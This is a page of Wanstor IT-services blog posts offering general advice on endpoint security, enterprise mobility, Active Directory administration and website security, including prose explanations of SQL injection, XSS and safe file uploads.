Endpoint Security – A state of transition

19th April 2018
|

Keyboard with sinister lighting

Endpoint security used to be a fairly mundane topic. The normal model used to be that the IT operations team would provision PCs with an approved image and then install Anti-Virus software on each system. The IT Operations team would then make periodic security updates (vulnerability scanning, patches, signature updates, etc.), but the endpoint security foundation was generally straightforward and easy to manage.

However in the last six months at Wanstor, we have seen an increase in the number of organisations increasing their focus on endpoint security and its associated people, processes, and technologies. This is largely down to mobility strategies starting to mature, BYOD becoming more common and mobile working the norm for many employees. Because of these market trends many businesses and not for profit organisations have had to increase their endpoint security budgets to cope with the changing working practices they are now facing.

The maturing of market trends have also meant many endpoint security vendors have had to change their strategies to cope with a transitioning end user workforce who want a stable office environment combined with a flexible work from anywhere approach.

At Wanstor we have seen the endpoint security strategy changing and predominantly being driven by the following factors in many organisations:

Cyber risks need to be addressed, especially around information security best practices – This is a clear indication that many IT security processes organisations have in place are not fit for a changing regulatory and mobile landscape.

Problems caused by the volume and diversity of devices – Addressing new risks associated with mobile endpoints should be a top endpoint security strategy requirement for all IT departments. This will only increase with the addition of more cloud, mobile, and Internet-of-Things (IoT) technologies

The need to address malware threats – Although it has been around for a long time many organisations are still struggling to get to grips with securing endpoints against malware threats. At Wanstor we do not find this overly surprising as the volume and sophistication of malware attacks has never been higher and the landscape is steadily becoming more dangerous. Additionally the sophistication and efficiency of the cybercriminal underworld alongside the easy access that would-be criminals have to sophisticated malware tools are a combination organisations of all sizes need to take seriously. At Wanstor we meet with 100’s of customers on a regular basis and they are all saying the same thing – We are concerned about our ability to stop these malware threats and stay a step ahead of attackers.

While various industry research studies suggest endpoint security strategies are driven by the factors identified above, many businesses and not for profit organisations still struggle to address endpoint security vulnerabilities and threats with legacy processes and technologies as well.

Some of the most common things we see at Wanstor include:

Security teams spending too much time concentrating on attacks which are happening now and not planning for the future – As the threat landscape has evolved so has the pressure on endpoint security staff, systems and processes. In many organisations they only have 1 or possibly 2 trained IT security professionals. This means when an attack happens they have to spend a lot of time attending to high-priority issues. They do not have sufficient time for process improvement or strategic planning. This challenge is something of a contradiction. Strategic improvements cannot and should not come at the expense of the security team failing to respond to high-priority issues, creating a quandary for many organizations: They know they need an endpoint security overhaul, but cannot afford to dedicate ample time at the expense of day-to-day security tactics. Effective endpoint tools must address this challenge by improving both the strategic and day-to-day position of the security team.

Organisations remain too focused/scared of regulatory compliance – At Wanstor we know it is a balance – IT security budgets vs regulatory compliance. However we have recently seen many businesses and not for profit organisations spending too much money/effort on becoming compliant within a changing regulatory landscape. Quite often this is because IT security teams have not worked with the business to properly define what the new regulations actually mean for the business and what the associated IT security spend should be. This often means IT security solutions are purchased ad-hoc and cost the organisation more money in the long run as they are purchased with a short term goal in mind rather than part of a wider security/regulatory plan.

At Wanstor we believe regulatory compliance should come as a result of strong security, and endpoint security cannot be achieved with a compliance-centric approach. For many IT teams this will mean a shift in thinking and closer working with other business departments such as the finance and legal teams.

Endpoint security has too many manual processes and controls – Endpoint security has undergone a major technical transition, but many organisations continue to rely on legacy products and processes to combat new challenges. It is often cheaper and easier for businesses and not for profit organisations to layer new products on top of legacy products as needs arise. However the trade-off is IT security teams become more and more inefficient as they have several layers of security processes and tools they have to manage which can create a security operations nightmare.

Wanstor’s Top Endpoint Security Challenges

  • Security staff spending a significant amount of time attending to high priority issues leading to no time for process improvement or strategic planning
  • Organisations too focused on meeting regulatory compliance requirements than addressing endpoint security risks with strong controls
  • Endpoint security is based upon too many manual processes making it difficult for the security staff to keep up to date with relevant security tasks and new technology trends
  • Organisations viewing endpoint security as a basic requirement and not giving it the time or resources it needs to protect users
  • Lack of monitoring of endpoint activities proactively so it can be difficult to detect a security incident.
  • Businesses and not for profit organisations not having access to the right vulnerability scanning and / or patch management tools so are always vulnerable to having an endpoint compromised by malware
  • Lack of budget to purchase the right endpoint security products as IT teams unsure of how to develop the right business case for management teams to make decisions on

In summary, Wanstor’s research of its own customers, and the changing mobility landscape identifies a situation where the principal endpoint security approach is not an adequate countermeasure for addressing the complexity and sophistication of modern IT security threats.

Wanstor’s own customer and market research evidence strongly suggests that businesses and not for profit organisations at the moment do not view existing endpoint security strategies as viable for blocking sophisticated attacks. As a result, many organisations need to supplement their existing endpoint security products with newer and more robust technologies that offer more functionality across incident detection, response, and remediation.

As a matter of course Wanstor believes all IT teams should take action now to review their endpoint security strategies and evaluate whether or not it is fit for purpose against business requirements. As a minimum the IT team should:

Investigate and test advanced anti-malware products – Organisations of all sizes should investigate and potentially acquire advanced anti-malware solutions. This is because normal solutions are no longer “good enough” to protect an organisation on their own. Instead IT teams need to recognise that all organisations are targets to hackers. In turn this means they should seek the strongest possible endpoint security solutions in order to deal with potential threats both now and in the future.

Continuous endpoint monitoring – As the great management saying goes “If you can’t manage it you can’t monitor it”. The question has to be: – Does your IT team have the right network and security monitoring in place? If it doesn’t how will you even know you are under attack or which endpoint devices are most vulnerable to attack? At Wanstor we always recommend appropriate network monitoring tools are purchased by the IT team. Quite often network monitoring and the ability to detect abnormal network traffic patterns early, help to prevent many security attacks before they become business critical.

Endpoint forensics – Endpoint forensic solutions can (when focused on actual need not cost) improve efficiency and effectiveness related to incident response, and reduce the time it takes for incident detection. Additionally by integrating endpoint data with network security analytics, it gives IT teams a more comprehensive and integrated view of security activities across networks and host systems.

In conclusion, endpoint security needs to change in most organisations to meet changing user needs and demands on IT. At the present time many organisations are struggling to hire the right staff, choose the right technologies, and respond to the many challenges of modern threats. The scale and diversity of these challenges can appear overwhelming, but organisations that take the time to devise and execute solid, integrated endpoint security strategies can the right returns on their security investments and protect their organisations at the same time.

Wanstor believes that organisations who are seeking to overhaul their endpoint security should integrate their endpoint security technologies with their network-level and log monitoring in order to improve incident detection, prevention, and response, while also streamlining the work of their security operations team.

For more information about Wanstor’s endpoint security services, please visit – https://www.wanstor.com/managed-it-security-services-business.htm

Read More

Enterprise Mobility Management – making sure the fundamentals are right

9th April 2018
|

Enterprise Mobility Management and ensuring the fundamentals are right

Mobility and bring-your-own device (BYOD) are transforming the way people work and the way businesses support them. At Wanstor we believe there is more to mobility than simply enabling remote access. To unlock the full potential of enterprise mobility, IT departments need to allow people the freedom to access all their apps and data from any device, seamlessly and conveniently. Mobile devices also call for the right approach to IT security to protect business information as they are used in more places, over untrusted networks, with a significant potential for loss or theft. The IT department has to maintain compliance and protect sensitive information wherever and however it’s used and stored, even when business and personal apps live side-by-side on the same device.

In this article Wanstor’s Mobility experts have developed a set of key points which the IT department need to take notice of as an enterprise mobility strategy is developed.

Protect and manage key assets, data and information

As employees access data and apps on multiple devices (including personally-owned smartphones and tablets) it can no longer be seen as realistic for IT to control and manage every aspect of the environment. At Wanstor we believe the approach IT teams should take is to focus on what matters most for a business across devices, data and information then choose the right mobility management models that make the most sense for your business and your mobile use cases.

Generally it is accepted there are four models to choose from, either individually or in combination. Mobile device management (MDM), Mobile hypervisors and containers, Mobile application management (MAM) and Application and desktop virtualization. Choosing the right mix of these 4 models will be intrinsically linked to your businesses success.

User experience needs to be at the centre of your thinking

Mobile devices have been a key driver of consumerization in the enterprise, giving people powerful new ways to work with apps and information in their personal lives. This has raised the expectations around IT and the services they provide particularly around mobile devices. No longer can IT teams put strict controls on users instead they must offer an IT experience that compares with the freedom and convenience allowed by consumer technology companies.  At Wanstor we always suggest before MDM planning gets underway that the IT team sits down with a range of users and talk about their needs and preferences to make sure the mobility strategy which is going to be put in place gives them what they really want.

As the IT team works to deliver a superior user experience, Wanstor experts suggest that they examine ways to give people more than they expect and provide useful capabilities they might not have thought of e.g.

  • Allow employees to access their apps and data on any device they use, complete with personal settings, so they can start work immediately once they have been given their work device
  • Give people the choice of self-service provisioning for any app they need through an enterprise app store with single sign-on
  • Automate controls on data sharing and management, such as the ability to copy data between applications, so people don’t have to remember specific policies
  • Define allowed device functionality on an app-by-app basis, so people can still use functions such as printing, camera and local data storage on some of their apps even if IT needs to turn them off for other apps
  • Make it simple for people to share and sync files from any device, and to share files with external parties simply by sending a link.

By developing a mobility strategy alongside the collaboration of users, IT teams can better meet users’ needs while gaining a valuable opportunity to set expectations. This helps to make sure employees understand IT’s own requirements to ensure compliance.

Avoid bypassing

Bypassing company controls and policies via a mobile device represents the worst-case scenario for enterprise mobility. It is surprisingly common that many users if they cannot find/access what they want in terms of IT on their mobile device will bypass IT altogether and access their own cloud services, apps and data.

Many people think great employees are accessing what they want, when they need it. Actually nothing could be further from the truth. Employees accessing unknown apps, sensitive data via public clouds and downloading files which bypass the visibility and control policies of IT mean a business is extremely vulnerable to attack. In reality IT policies and user education can only go so far to prevent bypasses from happening, realistically, if it’s the best solution for someone’s needs and it seems unlikely that IT will find out, it’s going to happen. This makes it essential to provide people with an incentive to work with IT and use its infrastructure, especially when it comes to sensitive data and apps. The best incentive is a superior user experience, delivered proactively and designed to meet peoples’ needs better than the unmanaged alternative.

Embed mobility in your service delivery strategy

Mobile users rely on a variety of application types—not just custom mobile apps, but also third party native mobile apps, Windows apps and SaaS solutions. In developing a mobility strategy, IT teams should think about the mix of apps used by the people and groups in their business, and how they should be accessed on mobile devices. It is widely accepted that there are four ways for people to access apps on mobile devices: Native, Virtualized access experience, Containerized experience and through a fully managed enterprise experience.

For most businesses, a combination of virtualized access and a containerized experience will support the full range of apps and use cases people rely on. This also makes it possible for IT to maintain visibility and control while providing a superior user experience. People can access hosted applications and native mobile apps—as well as SaaS apps such as Salesforce and NetSuite— through a unified enterprise single sign-on. When an employee leaves the business, IT can immediately disable the person’s account to remove access to all native mobile, hosted and SaaS apps used on the device.

Automation is the key to successful EMM outcomes

Automation not only simplifies life for the IT department it also helps them to deliver a better user experience. Think about the difference automation can make for addressing common mobility needs like:

  • An employee replaces a lost device or upgrades to a new one. With the click of a single URL, all of the individual’s business apps and work information are available on the new device, ready for work.
  • As an employee moves from location to location and network to network, situational and adaptive access controls reconfigure apps automatically to make sure appropriate security, with complete transparency for the user.
  • A board member arrives for a meeting, tablet in hand. All the documents for the meeting are automatically loaded onto the device, configured selectively by IT for read-only access, and restricted to a containerized app as needed. Especially sensitive documents can be set to disappear automatically from the device as soon as the member leaves the room.
  • As employees change roles in the business, the relevant apps for their current position are made available automatically, while apps that are no longer needed disappear. Third-party SaaS licenses are instantly reclaimed for reassignment.

One way to perform this type of automation is through Active Directory. First, link a specific role with a corresponding container. Anyone defined in that role will automatically inherit the container and all the apps, data, settings and privileges associated with it. On the device itself, you can use MDM to centrally set up Wi-Fi PINs and passwords, user certificates, two-factor authentication and other elements as needed to support these automated processes.

Define networking requirements

Different applications and use cases can have different networking requirements, from an intranet or Microsoft SharePoint site, to an external partner’s portal, to a sensitive app requiring mutual SSL authentication. Enforcing the highest security settings at the device level degrades the user experience unnecessarily; on the other hand, requiring people to apply different settings for each app can be even more tiresome for them.

By locking down networks to specific containers or apps, with separate settings defined for each, the IT team can make networking specific to each app without requiring extra steps from the user. People can just click on an app and get to work, while tasks such as signing in, accepting certificates or opening an app-specific VPN launch automatically by policy in the background.

Protect sensitive data

Unfortunately in many businesses, IT doesn’t know where the most sensitive data resides, and so must treat all data with the same top level of protection, an inefficient and costly approach. Mobility provides an opportunity for IT teams to protect data more selectively based on a classification model that meets unique business and security needs.

Many companies use a relatively simple model that classifies data into three categories—public, confidential and restricted—and also take into account the device and platform used while other businesses have a much more complex classification model and also take into account many more factors such as user role and location.

The data model deployed should take into account both data classification and device type. IT teams should also want to layer additional considerations such as device platform, location and user role into their security policy. By configuring network access through enterprise infrastructure for confidential and restricted data, IT teams can capture complete information on how people are using information to assess the effectiveness of your data sensitivity model and mobile control policy.

Clear about roles and ownership

Who in your business will own enterprise mobility? In most companies, mobility continues to be addressed through an ad hoc approach, often by a committee overseeing IT functions from infrastructure and networking to apps. Given the strategic role of mobility in the business, and the complex matrix of user and IT requirements to be addressed, it’s crucial to clearly define the structure, roles and processes around mobility. People should understand who is responsible for mobility and how they will manage it holistically across different IT functions. Ownership needs to be equally clear when it comes to mobile devices themselves. Your BYOD policy should address the grey area between fully managed, corporate-owned devices and user-owned devices strictly for personal use – for example:

Who is responsible for backups for a BYO device?

Who provides support and maintenance for the device, and how is it paid for?

How will discovery be handled if a subpoena seeks data or logs from a personally owned device?

What are the privacy implications for personal content when someone uses the same device for work?

Both users and IT should understand their roles and responsibilities to avoid misunderstandings.

Build compliance into the solution

Globally, businesses now face more than 300 security and privacy-related standards, regulations and laws, with more than 3,500 specific controls. Therefore it is not enough to simply try to meet these requirements, businesses need to be able to document compliance and allow full auditability.

Many businesses have already have solved the compliance challenge within their network. The last thing the IT department wants to do now is let enterprise mobility create a vast new problem to solve. Therefore IT departments should make sure mobile devices and platforms support seamless compliance with government mandates, industry standards and corporate security policies, from policy- and classification-based access control to secure data storage. Your EMM solution should provide complete logging and reporting to help you respond to audits quickly, efficiently—and successfully.

Prepare for the future

Don’t write your policies for only today! Keep in mind what enterprise mobility will look like in the next few years. Mobility, devices and users’ needs will continue to evolve and expand the potential of mobility, but they will also introduce new implications for security, compliance, manageability and user experience. IT departments need to pay attention to ongoing industry discussions about emerging technologies like these, and design their mobility strategy around core principles that can apply to any type of mobile device and use case. This way, they can minimize the frequent policy changes and iterations that may confuse and frustrate people.

Read More

Overcoming Active Directory Administrator Challenges

23rd February 2018
|

Overcoming Active Directory Administrator Challenges

The central role of Active Directory in business environments

Deployment of and reliance upon Active Directory in the enterprise continues to grow at a rapid pace, and is more often becoming the central data storage point for sensitive user data as well as the gateway to critical business information. This provides businesses with a consolidated, integrated and distributed directory service, and enables the business to better manage user and administrative access to business applications and services.

Over the past 10+ years, Wanstor has seen Active Directory’s role in the enterprise drastically expand, as has the need to secure the data it both stores and enables access to. Unfortunately, native Active Directory administration tools provide little control over user and administrative permissions and access. The lack of control makes the secure administration of Active Directory a challenging task for IT administrators. In addition to limited control over what users and administrators can do within Active Directory, the database has limited ability in reporting on activities performed therein. This makes it very difficult to meet audit requirements, and to secure Active Directory. As a result, many businesses need assistance in creating repeatable, enforceable processes that will reduce their administrative overhead, whilst helping increase the availability and security of their systems.

Because Active Directory is an essential part of the IT infrastructure, IT teams must manage it both thoughtfully and diligently – controlling it, securing it and auditing it. Not surprisingly, with an application of this importance there are challenges to confront and resolve in reducing risk, whilst deriving maximum value for the business. This blog will examine some of the most challenging administrative tasks related to Active Directory.

Compliance Auditing and Reporting

To satisfy audit requirements, businesses must demonstrate control over the security of sensitive and business-critical data. However, without additional tools, demonstrating regulatory compliance with Active Directory is time-consuming, tedious and complex.

Auditors and stakeholders require detailed information about privileged-user activity. This level of granular information allows interested parties to troubleshoot problems and also provides information necessary to improve the performance and availability of Active Directory.

Auditing and reporting on Active Directory has always been a challenge. To more easily achieve, demonstrate and maintain compliance, businesses should employ a solution that provides robust, custom reporting and auditing capabilities. Reporting should provide information on what, when and where changes happen, and who made the changes.

Reporting capabilities should be flexible enough to provide graphical trend information for business stakeholders, while also providing granular detail necessary for administrators to improve their Active Directory deployment. Solutions should also securely store audit events for as long as necessary to meet data retention requirements and enable the easy search of these events.

Group Policy Management

Microsoft recommends that Group Policy be a cornerstone of Active Directory security. Leveraging the powerful capabilities of Group Policy, IT teams can manage and configure user and asset settings, applications and operating systems from a central console. It is an indispensable resource for managing user access, permissions and security settings in the Windows environment.

However maintaining a large number of Group Policy Objects (GPOs), which store policy settings, can be a challenging task. for example, Administrators should take special care in large IT environments with many system administrators, because making changes to GPOs can affect every computer or user in a domain in real time. However, Group Policy lacks true change-management and version-control capabilities. Due to the limited native controls available, accomplishing something as simple as deploying a shortcut requires writing a script. Custom scripts are often complex to create and difficult to debug and test. If the script fails or causes disruption in the live environment, there is no way to roll back to the last known setting or configuration. Malicious or unintended changes to Group Policy can have devastating and permanent effects on an IT environment and a business.

To prevent Group Policy changes that can negatively impact the business, IT teams often restrict administrative privilege to a few highly-skilled administrators. As a result, these staff members are overburdened with administering Group Policy rather than supporting the greater goals of the business. To leverage the powerful capabilities of Group Policy, it is necessary to have a solution in place that provides a secure offline repository to model and predict the impact of Group Policy changes before they go live. The ability to plan, control and troubleshoot Group Policy changes, with an approved change and release-management process, enables IT teams to improve the security and compliance of their Windows environment without making business-crippling administrative errors.

Businesses should also employ a solution for managing Group Policy that enables easy and flexible reporting to demonstrate that they’ve met audit requirements.

User Provisioning, Re-provisioning and De-provisioning

Most employees require access to several systems and applications, and each programme has its own account and login information. Even with today’s more advanced processes and systems, employees often find themselves waiting for days for access to the systems they need. This can cost businesses thousands of pounds in lost productivity and employee downtime.

To minimize workloads and expedite the provisioning process, many businesses view Active Directory to be the commanding data store for managing user account information and access rights to IT resources and assets. Provisioning, re-provisioning and de-provisioning access via Active Directory is often a manual process. In a large business, maintaining appropriate user permissions and access can be a time-consuming activity, especially when the business has significant personnel turnover. Systems administrators often spend hours creating, modifying and removing credentials. In a large, complex business, manual provisioning can take days. There are no automation or policy enforcement capabilities native to Active Directory. With little control in place, there is no way to make sure that users will receive the access they need when they need it.

Additionally, there is no system of checks and balances. Administrative errors can easily result in elevated user privileges that can lead to security breaches, malicious activity or unintended errors that can expose the business to significant risk. Businesses should look for an automated solution to execute provisioning activities. Implementing an automated solution with approval capabilities greatly reduces the burden on administrators, improves adherence to security policies, improves standards and decreases the time a user must wait for access. It also speeds up the removal of user access, which minimizes the ability of a user with malicious intent to access sensitive data.

Secure Delegation of User Privilege

Reducing the number of users with elevated administrative privileges is a constant challenge for the owners of Active Directory. Many user and helpdesk requests require interaction with Active Directory, but these common interactions often result in elevated access for users who do not need it to perform their jobs. Because there are only two levels of administrative access in Active Directory (Domain Administrator or Enterprise Administrator), it is very difficult to control what users can see and do once they gain administrative privileges.

Once a user has access to powerful administrative capabilities, they can easily access sensitive business and user information, elevate their privileges and even make changes within Active Directory. Elevated administrative privileges, especially when in the hands of someone with malicious intent, dramatically increase the risk exposure of Active Directory and the applications, users and systems that rely upon it. At Wanstor we have found through our years of experience of dealing with Active Directory that it is not uncommon for a business to discover that thousands of users have elevated administrative privileges. Each user with unauthorized administrative privileges presents a unique threat to the security of the IT infrastructure and business. Coupled with Active Directory’s latent vulnerabilities, it is easy for someone to make business-crippling administrative changes. When this occurs, troubleshooting becomes difficult, as auditing and reporting limitations make it nearly impossible to quickly gather a clear picture of the problem.

To reduce the risk associated with elevated user privilege and make sure that users only have access to the information they require, businesses should seek a solution that can securely delegate entitlements. This is a requirement to meet separation-of-duties mandates, as well as a way to share the administrative load by securely delegating privileges to subordinates.

Change Auditing and Monitoring

To achieve and maintain a secure and compliant IT environment, IT administrators must control change and monitor for unauthorized changes that may negatively impact their business. Active Directory change auditing is an important procedure for identifying and limiting errors and unauthorized changes to Active Directory configuration. One single change can put a business at risk, introducing security breaches and compliance issues.

Native Active Directory tools fail to proactively track, audit, report and alert administrators about vital configuration changes. Additionally, native real-time auditing and reporting on configuration changes, day-to-day operational changes and critical group changes do not exist. This exposes the business to risk, as the IT team’s ability to correct and limit damage is dependent on their ability to detect and troubleshoot a change once it has occurred.

A change that goes undetected can have a drastic impact on a business. E.g. someone who elevated their privileges and changed their identity to that of a senior member of the finance department could potentially access company funds resulting in theft, wire transfers and so forth. To reduce risk and help prevent security breaches, businesses should employ a solution that provides comprehensive change monitoring. This solution should include real-time change detection, intelligent notification, human-readable events, central auditing and detailed reporting. Employing a solution that encompasses all of these elements will enable IT teams to quickly and easily identify unauthorized changes, pinpoint their source, and resolve issues before they negatively impact the business.

Maintaining Data Integrity

It is important for businesses of all sizes to make sure that the data housed within Active Directory supports the needs of the business, especially as other applications rely on Active Directory for content and information.

Data integrity involves both the consistency of data and the completeness of information. For example, there are multiple ways to enter a phone number. Entering data in inconsistent formats creates data pollution. Data pollution inhibits the business from efficiently organizing and accessing important information. Another example of data inconsistency is the ability to abbreviate a department name. Think of the various ways to abbreviate “Accounting.” If there are inconsistencies in Active Directory’s data, there is no way to make sure that an administrator can group all the members of accounting together, which is necessary for payroll, communications, systems access and so on. Another vital aspect of data integrity when working with Active Directory is the completeness of information. Active Directory provides no control over content that is entered natively. If no controls are in place, administrators can enter information in any format they wish and leave fields that the business relies upon blank. To support and provide trustworthy information to all aspects of the business that rely on Active Directory, businesses should employ a solution that controls both the format and completeness of data entered in Active Directory. By putting these controls in place, IT teams can drastically reduce data pollution and significantly improve the uniformity and completeness of the content in Active Directory.

Self-Service Administration

Most requests made by the business or by users require access to and administration of Active Directory. This is often manual work and there are few controls in place to prevent administrative errors. Active Directory’s inherent complexity makes these errors common, and just one mistake could do damage to the entire security infrastructure. With the lack of controls, the business cannot have just anyone administering Active Directory.

While it may be practical to employ engineers and consultants to install and maintain Active Directory, businesses cannot afford to have their highly-skilled and valuable employees spending the majority of their time responding to relatively trivial user requests. Self-service administration and automation are logical solutions for businesses looking to streamline operations, become more efficient and improve compliance. This is achieved by placing controls around common administrative tasks and enabling the system to perform user requests without tasking highly skilled administrators.

Businesses should identify processes that are routine yet hands-on, and consider solutions that provide user self-service and automation of the process. Automation of these processes reduces the workload on highly-skilled administrators, it also improves compliance with policies since automation does not allow users to skip steps in the process. Businesses should also look for self-service and automation solutions that allow for approval and provide a comprehensive audit trail of events to help demonstrate policy compliance.

Final thoughts

Active Directory has found its home as a mission-critical component of the IT infrastructure. As businesses continue to leverage it for its powerful capabilities as a commanding repository, Active Directory is a vital part of enterprise security. Therefore, administrators must be able to control, monitor, administer and protect it with the same degree of discipline currently applied to other high-profile information such as credit card data, customer data and so forth. Because native tools do not enable or support the secure and disciplined administration of Active Directory, businesses must look for solutions that enable its controlled and efficient administration. These solutions help make sure the business information housed in Active Directory is both secure and appropriately serving the needs of the business.

Read More

A blog on Website Security

22nd February 2018
|

At Wanstor this week, we have been discussing website security. This is because of news that the Information Commissioner’s Office or ICO had to take its website down after a warning that hackers were taking control of visitor’s computers to mine cryptocurrency.

Following this story, some of our customers have been in contact regarding website security and suggested best practices. In light of this, Wanstor’s security experts have come together to develop the following high level guide to website security.

You may not think your website has anything worth hacking, but corporate websites are compromised all the time. Despite what people think, the majority of website security breaches are not to steal data or deface a website. Instead they are hacked to use servers as an email relay for spam, or to setup a temporary web server, normally to serve files of an illegal nature. Other common ways to abuse compromised machines include using your company servers as part of a botnet, or to mine for Bitcoins. You could even be hit by ransomware. Hacking is regularly performed by automated scripts written to scour the Internet in an attempt to exploit known website security issues in software. By following the tips below, your website should be able to operate in a safer way and put hackers and the tools they use off from attack.

Keep software updated

It may seem obvious, but making sure you keep all software updated is vital to keeping your site secure. This applies to both the server operating system and to any software you may be running on your website such as a CMS or forum. When holes are found in website security software, hackers are quick to attempt abuse. If you are using a managed hosting solution, then your hosting company should take care of any updates, so you do not need to worry about this – unless your hosting company contacts you to tell you to worry!

If you are using third-party software on your website such as a CMS or forum, you should make sure you are quick to apply any security patches. Most vendors have a mailing list or RSS feed detailing any website security issues.  Many developers use tools like Composer, npm, or RubyGems to manage their software dependencies, and security vulnerabilities appearing in a package you depend upon but aren’t paying any attention to is one of the easiest ways to get caught out. Make sure you keep your dependencies up to date and use relevant tools to get automatic notifications when a vulnerability is announced in one of your components.

SQL injection

SQL injection attacks occur when attackers use a web form field or URL parameter to gain access to or manipulate your database. When you use standard Transact SQL, it is easy for such individuals to insert rogue code into your query that could be used to change tables, retrieve information and delete data. You can easily prevent this by always using parameterised queries – most web languages have this feature and it is easy to implement.

XSS

Cross-site scripting (XSS) attacks inject malicious JavaScript into your pages, which then runs in the browsers of your users, allowing page content to be modified or information to be stolen or transmitted to the attacker. For example, if you show comments on a page without validation, attackers might submit comments containing script tags and JavaScript, which could run in every other user’s browser and steal their login cookie, allowing the attacker to take control of accounts owned by each user who views the comment. You need to ensure that users cannot inject active JavaScript content into your pages.

The key here is to focus on how your user-generated content could escape the bounds you expect and be interpreted by the browser as something other than what you intended. This is similar to defending against SQL injection. When dynamically generating HTML, use functions which explicitly make the changes you’re looking for, or use functions in your templating tool that automatically ensure appropriate escaping, rather than concatenating strings or setting raw HTML content.

Another powerful tool in the XSS defender’s toolbox is Content Security Policy (CSP). CSP is a header your server can return which tells the browser to limit how and what JavaScript is executed in the page, for example to disallow running of any scripts not hosted on your domain, disallow inline JavaScript. Mozilla have an excellent guide with some example configurations. This makes it harder for an attacker’s scripts to work, even if they can get them into your page.

Error messages

Be careful with how much information you give away in error messages. Provide only minimal errors to your users, to make sure they do not leak secrets present on your server. Although tempting, do not provide full exception details either, as these can make complex attacks like SQL injection far easier. Keep detailed errors in your server logs, and show users only the information they need to see.

Server side validation

Validation should always be done both on the browser and server side. The browser can catch simple failures like mandatory fields which are empty and when you enter text into a numbers only field. These can however be bypassed, and you should make sure you check for these validation and deeper validation server side as failing to do so could lead to malicious code or scripting code being inserted into the database or could cause undesirable results in your website.

Passwords

Everyone knows they should use complex passwords, but that doesn’t mean they always do. It is crucial to use strong passwords to your server and website admin area, but equally also important to insist on good password practices for your users to protect the security of their accounts. As much as users may not like it, enforcing password requirements such as a minimum of around eight characters, including an uppercase letter and number will help to protect their information in the long run. Passwords should always be stored as encrypted values, preferably using a one way hashing algorithm. Using this method means when you are authenticating users you are only ever comparing encrypted values.

In the event of someone hacking in and stealing your passwords, using hashed passwords could help damage limitation, as decrypting them is not possible. The best someone can do is a dictionary attack or brute force attack, essentially guessing every combination until it finds a match.

Thankfully, many CMS’s provide user management out of the box with a lot of these website security features built in, although some configuration or extra modules might be required to use to set the minimum password strength. If you are using .NET then its worth using membership providers as they are very configurable, provide inbuilt website security and include readymade controls for login and password reset.

File uploads

Allowing users to upload files to your website can be a significant website security risk, even if it’s simply to change their photo, background picture or avatar. The risk is that any file uploaded however innocent it may look, could contain a script that when executed on your server completely opens up your website. If you have a file upload form then you need to treat all files with great suspicion. If you are allowing users to upload images, you cannot rely on the file extension or the mime type to verify that the file is an image as these can easily be faked. Even opening the file and reading the header, or using functions to check the image size are not fool proof. Most images formats allow storing a comment section which could contain PHP code that could be executed by the server.

So what can you do to prevent this? Ultimately you want to stop users from being able to execute any file they upload. By default web servers won’t attempt to execute files with image extensions, but it isn’t recommended to rely solely on checking the file extension as a file with the name image.jpg.php has been known to get through. Some options are to rename the file on upload to make sure ensure the correct file extension, or to change the file permissions so it can’t be executed.

In Wanstor’s opinion, the recommended solution is to prevent direct access to uploaded files. This way, any files uploaded to your website are stored in a folder outside of the webroot or in the database as a blob. If your files are not directly accessible you will need to create a script to fetch the files from the private folder (or an HTTP handler in .NET) and deliver them to the browser. Image tags support an src attribute that is not a direct URL to an image, so your src attribute can point to your file delivery script providing you set the correct content type in the HTTP header.

The majority of hosting providers deal with the server configuration for you, but if you are hosting your website on your own server then there are few things you will want to check. E.g. Make sure you have a firewall setup, and are blocking all non-essential ports.

If you are allowing files to be uploaded from the Internet only use secure transport methods to your server such as SFTP or SSH. Where possible have your database running on a different server to that of your web server. Doing this means the database server cannot be accessed directly from the outside world, only your web server can access it, minimising the risk of your data being exposed. Finally, don’t forget about restricting physical access to your server.

HTTPS

HTTPS is a protocol used to provide security over the Internet. HTTPS guarantees users that they’re communicating with the server that they should be, and that nobody else can intercept or modify the content in transit. If you have anything that your users might want to remain private, it’s highly advisable to use only HTTPS in delivering it. That of course means credit card and login pages. A login form will often set a cookie for example, which is sent with every other request to your site that a logged in user makes, and is used to authenticate those requests. An attacker stealing this would be able to perfectly imitate a user and take over their login session. To defeat these kind of attacks, you almost always want to use HTTPS for your entire site.

Website security tools

Once you think you have done all you can, then it’s time to test your website security. The most effective way of doing this is via website security tools, often referred to as penetration testing or pen testing for short. There are many commercial and free products to assist you in this. They work on a similar basis to scripts hackers will use in that they test all know exploits and attempt to compromise your site using some of the previous mentioned methods such as SQL injection.

Some free tools that are worth looking at include:

  • Netsparker (Free community edition and trial version available). Good for testing SQL injection and XSS.
  • OpenVAS claims to be the most advanced open source security scanner. Good for testing known vulnerabilities, currently scans over 25,000. But it can be difficult to setup and requires a OpenVAS server to be installed which only runs on *nix. OpenVAS was fork of Nessus before it became a closed-source commercial product.
  • io is a tool offering a free online check to quickly report which security headers mentioned above (such as CSP and HSTS) a domain has enabled and correctly configured.
  • Xenotix XSS Exploit Framework is a tool from OWASP (Open Web Application Security Project) that includes a huge selection of XSS attack examples, which you can run to quickly confirm whether your site’s inputs are vulnerable in Chrome, Firefox and IE.

The results from automated tests can be daunting, as they present a wealth of potential issues. The important thing is to focus on the critical issues first. Each issue reported normally comes with a good explanation of the potential vulnerability. You will probably find that some of the issues rated as low or medium in importance aren’t a concern for your site. If you wish to take things a step further then there are some further steps you can take to manually try to compromise your site by altering POST/GET values. A debugging proxy can assist you here as it allows you to intercept the values of an HTTP request between your browser and the server. A popular freeware application called Fiddler is a good starting point.

So what should you be trying to alter on the request? If you have pages which should only be visible to a logged in user then try changing URL parameters such as user id, or cookie values in an attempt to view details of another user. Another area worth testing are forms, changing the POST values to attempt to submit code to perform XSS or to upload a server side script.

Hopefully these tips will help keep your site and information safe. Thankfully most Content Management Systems have inbuilt website security features; it is a still a good idea to have knowledge of the most common security exploits, so you can make sure that you are covered.

For more information about Wanstor’s IT security solutions, please click here – https://www.wanstor.com/managed-it-security-services-business.htm

Read More

Why flash storage is so important to the success of hybrid IT infrastructure

9th February 2018
|

Why flash storage is so important to the success of hybrid IT infrastructure

IT leaders are facing critical decisions on how to best deploy data centre and cloud resources to enable digital transformation. The advantages of cloud models have been written about by many IT industry commentators, experts and opinion makers. Understandably, cloud computing is fundamental to delivering the agility, cost efficiencies and simplified operations necessary for modern IT workloads and applications at scale. However the truth is, even in today’s cloud era, IT leaders still need their own IT infrastructure and data centres to make IT work for their business.

